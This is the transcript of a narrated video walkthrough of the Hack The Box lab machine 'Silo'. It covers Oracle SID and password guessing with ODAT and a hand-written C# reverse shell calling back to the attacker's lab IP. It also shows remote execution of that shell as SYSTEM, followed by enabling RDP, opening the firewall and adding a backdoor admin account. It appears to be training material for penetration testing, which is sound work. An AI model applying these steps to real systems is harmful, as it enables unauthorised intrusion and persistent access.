Hey everyone, and welcome to another edition of Can You Hack It? I am your host Ben, also known as Iceman, and this week we'll be taking a look at another box from Hackthebox.eu, this one called Silo. And if you notice right now, my desktop looks a little different, and you may be saying, what the hell? That's not Kali. And you're right, it's not. It's Windows 10. And what we're going to be doing this week, just for fun, is we're actually going to be using Windows 10 as our host to be mounting our attack from. The reason I'm doing this is just for the heck of it. A little bit to show how Windows subsystem on Linux works, a little bit to show that a lot of these things can be done in Windows, because I hear a lot online people telling other people that you can't hack from Windows, you have to have Linux. And while I agree that Linux is a preferable platform, I completely disagree that it can't be done from Windows, especially if you develop your own tools. Now, that said, most of the tools are Linux only. A good majority of them will now run in Windows subsystem for Linux. Anything that requires raw socket access may not work or may not work very well. Nmap's a good example of that. I know that they've prioritized fixing it. I don't think they have yet. And I don't feel like digging into it in the middle of this video, so we won't find out. And hopefully this works okay, because I decided to do this last minute and I haven't actually tested any of it. So if we bang our heads on too many walls, I may use the magic of editing and flip us over into a traditional Kali environment so that we can get it done. But we're going to start out in here, see how it works out. So this is the box Silo. As I said, Windows box, a little over halfway difficult. I think most of the difficulty in this box for most people was dealing with Oracle. We'll get more into that later. I don't want to spoil too much up front, but basically if you were familiar with it, it was probably on the easier side, and if you weren't, it was probably fairly difficult. There's some heavy lifting to do on certain things if you don't know some shortcuts. So anyway, without further ado, let's go ahead and get started. So our IP address of our box is 10.10.10.82. Our Windows host is connected to OpenVPN. We can pop open a command line, do a quick ping to make sure we can ping the box. We can. And so let's go ahead and get our traditional Nmap running. We'll do this from Windows just for fun. Like I said, I don't think it works too well in Windows Subsystem for Linux yet, so that's one of the reasons why we don't want to mess around with it on there. So if we do nmap-t5-sc and sv for enumerate scripts and versions, v so it shows the output while we're going. I won't bother actually writing this one. Normally I do an OA and write it to somewhere. We'll skip it for this video. And then -- unprivileged. And the reason we're doing unprivileged is just because, well, one, I didn't open an administrative command prompt, and two, even when you do, it gets kind of goofy. So if we can run it unprivileged, which I think we can, it will save me some heartache. So it looks like we've got port 80 open, we've got 139, 445, 135, so we've got some MSRPC and NetBIOS stuff open. We've got 49, 154, which is probably just some high-numbered RPC port. While those are still running, let's take a look at the web server and see what we see. And it looks like a traditional IIS start page. So like if I did iis.start.htm, yeah, so it's just somebody installed IIS. They haven't set anything up on here yet. We can go ahead and spin up GoBuster or GoFuzz to see if there's anything to be found. For now, I'll go ahead and skip it. Let's see if we can figure out which version of Windows we're on. If we open the dev console, I never use the one in Edge, so bear with me here. That's what I'm looking for. So if we look at the load for our IIS start HTM, we can see our headers. The response header shows IIS 8.5. So let's just do IIS 8.5. And WikiLink here shows that IIS 8.5 was included with Windows Server 2012 R2 and Windows 8.1. And so we're probably working with one of those then, probably 8.1, but it looks like we're still scanning. It is a little slow in Windows and in a VM. One more port popped up that may be promising. That's 1521. Now normally some of these RPC ports or the NetBIOS ports, we could try and use some Metasploit exploits on, but typically that only works on Windows XP machines. There is some newer stuff, but we won't jump there right away. Instead, we'll take a look at this 1521. because if you're familiar with it, you could Google it if not, but that's in Oracle TSN port. So Oracle TSN 1521. And so basically, TSN is a proprietary networking technology used by Oracle on top of your traditional like TCP or UDP. I think it stands for like Transparent Network Substrate or something like that. Anyways, it gives us a connection to the database. And so what we can try and do is communicate with the database, see if we can find anything interesting in there. I think this may be where some people stumbled a little bit because they tried to go about it the traditional way, where you would download various tools from Oracle, like the Oracle Instant Client, the SDK, SQL Plus. All those things are, well, you have to register a bunch and download them, and it can be a pain. And so I think some people didn't realize that there's also a tool out there called ODAT. Oh, I should probably throw Oracle in. Oh, it's right there. The Oracle Database Attack Tool. So this has been out for a while, and what it is a collection of Python scripts that are capable of interacting with a Oracle database server. Now, we could either clone this repository and run the Python scripts directly. I haven't had as much luck with that personally as I have with running the ODAT standalones. And so if you click on that, download the 64-bit version, we'll open it up. For some reason it's being a little slow, so if it doesn't hurry up, I'll go ahead and use the magic of editing to make this wait go away. And boom, just like that, it's done. So if we extract this, and we'll extract it to ctemp. Looks like we already have it in here, so we'll just extract it to ctemp, overwrite the existing one. Okay, and so that's done. Now, most of you may have noticed that this is a Linux tool, and I'm running Windows. And so what do you do? Well, there's a couple things we can do. Let's minimize that. We're running what's called Windows Subsystem on Linux, and so that allows us to run a Linux distribution inside of our Windows. And it's not a VM, it's actually integrated with the Windows kernel. It's slightly buggy right now, but it's getting better fast, and so hopefully it will be full-blown soon. I would say for a lot of stuff it's full-blown. For penetration testing, not quite, because there's a lot of tools that use very low-level access to things that don't quite work properly. But like this tool should work fine, I think. So basically this is running Kali Linux inside of my Windows instance. I actually even have, see if it actually wants to play nice, have remote desktop running in it, and so if I wanted to get to a Kali desktop, I can simply remote desktop to my Kali instance, which is taking longer than it should, so I might need to xrpc start. Try this again. That's much better. And boom, we've got a Kali desktop here. If we wanted to run any of the GUI tools or something like that, we could. We don't need this for this stuff, so I'll go ahead and end the remote desktop session. But that's one feature that some people didn't seem to realize was in Subsystem for Linux. They thought, or Windows Subsystem for Linux, they thought that it was command line only. It's not true. You can run X Windows in it. You just need to have some way, either VNC, RDP, whatever, to connect to it. And so now that I've wasted some time with that, we'll go back to what we were doing, which is trying to enumerate the Oracle database. So we need to switch to our C drives temp folder, which is under mount C temp, and then go to the ODAT folder. And so we've got a bunch of libraries here, and we've got a single executable called ODAT libc 2.5-x86_64. So we run that, get the help for it. We see a handy little list of the different things that it's able to do. I'm going to point out ahead of time, you can run all, which runs all modules, does everything it possibly can. We won't do that here because I want to show you the different steps, but it would be something you could try yourself. And so the first thing we're going to do is try and enumerate SIDs, which is, if you're familiar with SQL, we'll just call it the equivalent of a database name. And so if we run that tool and we run the SID guesser, give it the IP address of our box, and not RBox, but the machine we're targeting, and the port of 1521. And it's actually got a, let's scroll up here and see if I can spot it really quickly. It's got a list built in that it's going to use. You can also pass one in if you wanted to, but it's got a list of SIDs, and what it'll do is it will try and enumerate through those and see which ones are available. There it is, SIDs.txt. So we'll get this going. Again, I'll use the magic of video editing to remove some of the wait time, because this is a slow process, especially in a VM. Alright, and so that's ran, and it's actually found a couple SIDs. I canceled out, as you can see here, it was brute forcing for SIDs. You can do that afterwards if the ones that you find, if you find any with the known list, don't work. But that obviously, like brute forcing anything, takes longer the more characters you get into it. So I went ahead and canceled it out since I don't think it's necessary. And so we've got a couple SIDs. We've got XE and we've got XE-XDB. And so what we can try and do next is find an account that will work. And I think this, yeah. So this tool also comes with a directory called accounts. And inside here, it's got some different lists. It's got a password text, a login text. It's got accounts multiple, I think, and accounts small. Let's see. I think we can probably start out with accounts small. We cat it. Small.txt. Looks like 134 lines, and so you see it's a username / a password. This list happens to be all capitals. What I like to do when the lists are all capitals is add some additional to it. So make it, username's not case sensitive, we can leave those capitals, but I like to also make a lowercase version of the passwords. If that doesn't work, sometimes you can do a capital first letter of the password, lowercase for the rest of them. You can try all kinds of different things. But just to get started, I usually like to take this initial list, modify it just a bit to get an uppercase and a lowercase version of the passwords, and then use it in the tool and see what we find. So I didn't actually check to make sure I have Python on here. I don't. I have to install Python. Install Python real quick. The downside to not doing things in advance is sometimes you don't have the tools that you expect, especially in these Windows Subsystem for Linux builds. They're a lot more stripped down than a traditional like Kali build, as you can see, because it doesn't even have Python on it. Luckily, you can install anything you want just as before using apt-get. So now we've got our Python shell, so we can read in that accounts small. So accounts raw is equal to open accounts small.txt. Read. Oh, let's actually just do this. And so if we look at accounts raw, we've got all the accounts now. If we do accounts or account lines, it's equal to accounts raw.split. We'll split it on the new line. Oops. So now we should have all the individual account lines. And then what we'll want to do is make a modified list. And so we just do modified accounts. Create an empty list. By the way, there's a million ways you could do this type of stuff. This is just one of them. So for entry in account lines, if it has a slash in it, because if you notice at the end here, it looks like we got a blank. That's the only one, but this will just simple work around that. In entry. So as long as it's got a slash in there, we'll split it into some fields. We'll split on that slash. And then we'll have user equal to field 0 is the first field, and pass 1 equal to fields 1, and pass 2 equal to fields 1 lower, so lowercase version of fields 1. And then what we'll do is modified accounts.append, and we'll append the user plus a slash plus pass 1, and plus pass 2. So now we should have divide accounts. So now, as you can see, DBA proxy uppercase, DBA proxy lowercase, so we've got what we want. So if we just do an output is equal to open, we'll call it userpass.txt, open write mode, output.write, and we need to add our new lines back in, so new line dot join modified accounts, and then output dot flush, and close it up. We can exit. Now we see userpass.text, so we cat that. That looks like what we were expecting, so we're good there. Bounce back to the directory that our executables in. And now we can run it looking for passwords using, I think it's called password guesser. Password stealer, password guesser, yeah. So password guesser, again, servers 10.10.10.82, ports 15.21. This time we're including the database is XE, and then accounts file, which is overriding the default one that it would normally use, is accounts userpass.text. So we'll get that thing going. Login anonymous has already been tested at least once. What do we want to do? We want to continue. And then again, we'll use the magic of editing so you don't have to sit through this. And it looks like we found our first set of credentials. We've got a couple minutes left on the scan, and so I'll go ahead and cancel it for right now. And we can see what we can do with these credentials. So it looks like the username is Scott and the password is Tiger, all lowercase. So now what we can try and do is utilize some of the different functions here, like this UTL file, which allows us to download, upload, or delete files, and external table, which allows us to read files or execute system commands. And so we can try and see if we can get a shell, perhaps. And so for that, we've got a couple options. We've got, our normal MSF Venom here. And so we would be able to create, say, a interpreter or reverse shell. Just because I think this is going to be a shorter video, I'll do something not so intelligent and see if maybe we can create a new, create our own reverse shell in .NET, just because why not? And so what we'll do is we'll create a command line tool that will hopefully allow us to open a reverse shell either using command line or PowerShell, although I'll probably use command line because there's more work involved sometimes in getting PowerShell to work. Sometimes it works just fine. So first thing we're going to need is a TCP client. So since we're working, oops. Why I wanted to do that. Oh, because I'm in the main function. Static, we're going to need a TCP client. We'll just call that client. And we'll need a stream reader. You can ignore these not being found yet. We'll do the imports in just a second. We'll call that reader. And then stream writer. And we'll call that writer. I know I'm super creative with my names. And that's probably good enough. So if we just mouse over these, I'll enter, I should be able to do our imports. Okay. So we're good there now. Let's see here. So we need to instantiate a new client. And sorry, I'm going to try and do this as fast as I can while explaining a little bit at least. And by the way, there's not a whole lot of need to do this because you could probably just find something out there real quick too. But sometimes, especially on these boxes that end up being shorter, I like to show something a little different. And in this case, I guess we're doing Windows and we're doing some development in C#. So let's do a client.connect, my IP address, 10.10.14.15, port 44. 444, I guess. Reason I'm doing 444 is I just remembered, I normally do 4444 like Metasploit does, but I just remembered I think I actually didn't clean up after myself, and so there's possibly a Meterpreter reverse session from when I was doing this box earlier today to refresh myself in Kali that's going to be trying to connect back, and we don't want to catch that on accident. So now we need a network stream, netstream, client.getStream. So that gets the stream from the TCP client. We'll assign a reader to a stream reader. So we're instantiating a reader, and we're instantiating it using the net stream. Same thing with the writer. Header, net stream. We want to set the writer to auto-flush. And that's probably good enough. Then I'm going to do something that I yell at people constantly about when we're reviewing code, which is leave it a blank try-catch. You should never do that. It swallows exceptions. But in this case, this is for a reverse shell where we're not going to have any real ability to debug it anyway, and so I don't care. And the only reason it's in a try-catch is just so that, I suppose it doesn't matter. I was going to say so that we don't crash out if we have an issue there, but if we have an issue there, we're doomed anyway. So let's just ignore that. So now we need a new process. Import diagnostics for that. P.startInfo file name, and just do, I don't need the, just do cmd.exe. P.startInfo create no window. Screw it, I'll leave it false. That way, if we debug it here locally, I'll be able to see the window. Normally I would set it to true, so it doesn't actually open a window up, but again, since I probably will run this first locally just so we can make sure that things actually work before we go and send it, I'll leave it showing. Use shell execute. False. Info. Redirect standard input, output, and error needs to be done. We need to attach an event handler for when we receive data. And we'll call it output handler. So what this does, if you're not familiar with .NET or event callbacks, is when data is received by this process, by the output, standard output, it will call the function output handler and pass it information. So if we start that, begin output read line. And then standard input write line. We'll just write a blank line to standard input. And then we need to do a while loop. We're just going to loop through here forever. String input is equal to reader.readline. And so that's going to read from our network stream, and then we will append a new line character to it. Actually, since this is Windows, let's do an RN. Standard input.writeline. Oh, you know what? I shouldn't need to append that since I'm doing a write line. So let's comment that out. And again, catch exception, and we'll just break when we catch an exception. And so now we're almost ready, but we need to implement our output handler. So there's a couple ways we can do it. We can either write the method declaration ourselves, or we can let it do it for us, which I think this should work. Yeah. Okay. And so now we just need to fill it up. So string output is equal to e.data.trim. So that takes the data from the output, and we just trim any white space off of it. If if not string is null or empty. Output. Then we will write it to our network stream. So writer dot write line output. And the thing I'm thinking of here, you can tell that I'm thinking kind of slowly, is that we may need to add some slightly advanced, and by advanced I just mean something, to handle where the command output stops and we're back at our command prompt. Without that, I think I'm going to end up having some weird line wrapping and other stuff, but for now we'll just see what happens. Roll the dice. Writer.flush. We told it to auto flush. I'm going to flush it anyway. So I think we've got functional code here. So let us start up a handler and see lvnp 444 ncat lvnp 444. Okay. Let's see what happens. Our shell popped up, and it looks like we have access to the command line. As I was pointing out, there's some weirdness where our cursor's down below, but we can still execute commands. I'm not sure why our command prompt isn't coming back also, so yeah, so I think there's just some slight weirdness. So we'll close out of that. We get an unhandled exception, that's fine. That just has to do with our application closing while it was trying to do some stuff. So now we're back with our listener. Let me try and clean this up really, really fast. If I can't, then we'll move on and just live with the way that it is, because it's usable. Let's throw a boolean in here, static bool first line. And then we need to, let's see, if first line is equal to false, return. And then if output dot starts with colon, oops, and output dot ends with then writer dot write with no new line output, else we'll write with a new line. So we don't include a new line once it's back at the prompt, which keeps our cursor up top. And I think we need to tweak with this a little bit. First line is set back to true once we write. Let's see if this behaves any better. Nope. It's good enough that I'm gonna live with it. Oh, you know what? I spotted it. The C happens to be lowercase. I think that's where the issue lies. Still doing the same thing. Oh. I don't know if any of your developers and you've done stupid stuff like that before where I convert it to lowercase and then I'm still checking to see if it matches an uppercase C. That doesn't usually work very well. In fact, it ensures that it will never match. Okay, so now we're on the right line. Now things look a little better. And so Let's see if we can catch a real shell now instead of locally. So we'll go ahead and do a release build, even though honestly it doesn't matter. Shell bin release, shell.exe, we'll copy it. We will throw it in temp. Let's just throw it in here, since that's where we're working out of. So we're listening. Let's go back to our Kali, and let's see if we can send it. So ODAT. UTL file, XS 10.10.10.82, use Scott for user, P password tiger, and D for our database is XE, put file. The way they did the commands on this is kind of weird. We say where we're going to put it, so we're going to put it in C users, and then we say what we're going to call it. We can't just give it as one single thing, so we'll call it shell.exe. I guess I'll match my case, shell.exe, and then we're going to tell it where it's going to find it. So it's going to find it in mmtc temp, ODAT, shell.exe. So that should be good. Oh, insufficient privileges. So we don't have the privileges to write. There's another thing we can test here. File help. So if you see here, we can connect. The way that Oracle works is we don't connect with privileges by default, even if the user has privileges. And so we can try and connect as DBA or operator by adding a flag. So we will add the sys DBA and see if we can connect as the DBA. And it looks like it liked that. So we presumably have our file uploaded now. And so now all we need to do is see if we can execute it. And so to do that, we're going to run external table, I believe. Table allows us to execute. So same thing, sys DBA, our IP address, our port, user Scott, password of tiger, database of XE, exec, //users, shell.exe, and then we wait. So it's trying to execute the command stored at C users. And it's hanging, so that may be a good sign. Yeah, it is. So we've now got our homebrewed shell. So we do dir. Let's see what's there. So we switch directories to users. Let's see which accounts we have. For some reason this is acting a little slow. So we've got administrator and we've got Pinas. I don't. I'm sure I pronounced that wrong and I won't attempt again. Pineas. So since Windows box is probably going to be on the desktop. So we've got a couple files, one called Oracle Issues.txt. Do this. You can either quote it or you can do something like that. Should work. Or not. Oh, because I'm trying to cat it. Type. Support vendor engage hosting Windows. That's interesting. So we've got a Dropbox link and a password for it. Just for fun. I actually don't know that I noticed this the first time. I don't know if this is actually part of the box, but since it's here, I assume it probably is. So we copy that password, which if you notice that password has some funky UTF characters at the front of it. And it says incorrect password, so we'll just ignore that for now, but it'll be curious to see from other write-ups and videos if somebody made any use of that for anything. So if we do a who am I, oops, sorry, my focus was right. Who am I? Did I lose my shell? No. Oh, so we're running a system, and so since we're system, we have everything we ever wanted on this box, so there is no need to privilege escalate. So let's take a look at the first 16 characters of that user flag, and then we'll see if we can get the admin flag, and then we'll wrap this box up. So if we do a PowerShell exec bypass non-interactive cat /users, I guess I don't need to fully qualify it since I'm in here. User.txt substring 016. That should work. Again, I'm not really sure why our shell's being so slow. It may have to do something, have something to do with the do-it-yourself shell that we used instead of Meterpreter or something. If it takes any longer, I'll do this a different way. Because that command should not be taking that long to execute. Oh, there we go. Doesn't look like it actually worked. Let's try and use the fully qualified path just in case it had something to do with that. HINEAS desktop. Text. And so there's the first 16 of the user flag. Now if we run the same command, this time switch out for administrator and root.txt. And there's the first 16 of root. So that's it. Box is owned. We've got shell as system, so we could do anything we wanted at this point. In fact, just for fun, and I don't recommend doing this, but I'm going to reset this box right after I do this. Let's see if we can actually local machine system control set control terminal server -v f9 ts connections -t reg dword -d0-f. What that should do is enable remote desktop. So it completed successfully. Remote desktop connection 10.10.10.82. Firewall may be on also. Yeah, that failed. Let's try one more thing real quick just for fun. Net sh firewall set service type equals remote desktop node equals enable. See if that worked. Did so if we had credentials, which I could easily create. Let's do that too, I suppose. Oops. Net user add placeman. Password is please subscribe. Admin, so that's new local group administrators baseman add. So that's done. So now we do baseman please subscribe. And that box, or my box, because it's a brand new VM, doesn't have the CRED SSP remediation patch done. So I could technically modify the registry on either my system or that system to allow remote connections despite not having that update applied. I'm not going to because it's not worth it. My guess, I think, is my side has it applied, the other side doesn't. Doesn't matter. Anyway, you could have gotten remote access to the box if you did something like that, but we're done for now, so I'm going to go ahead and reset the box. That way everything's cleaned up for the next person. But hope you enjoyed the video. Give it a thumbs up if you did. Feel free to leave some comments. Hit me up on Hackthebox if you want to. Visit my website, Twitter, whatever. Anyway, everybody have a great weekend, all right? Bye.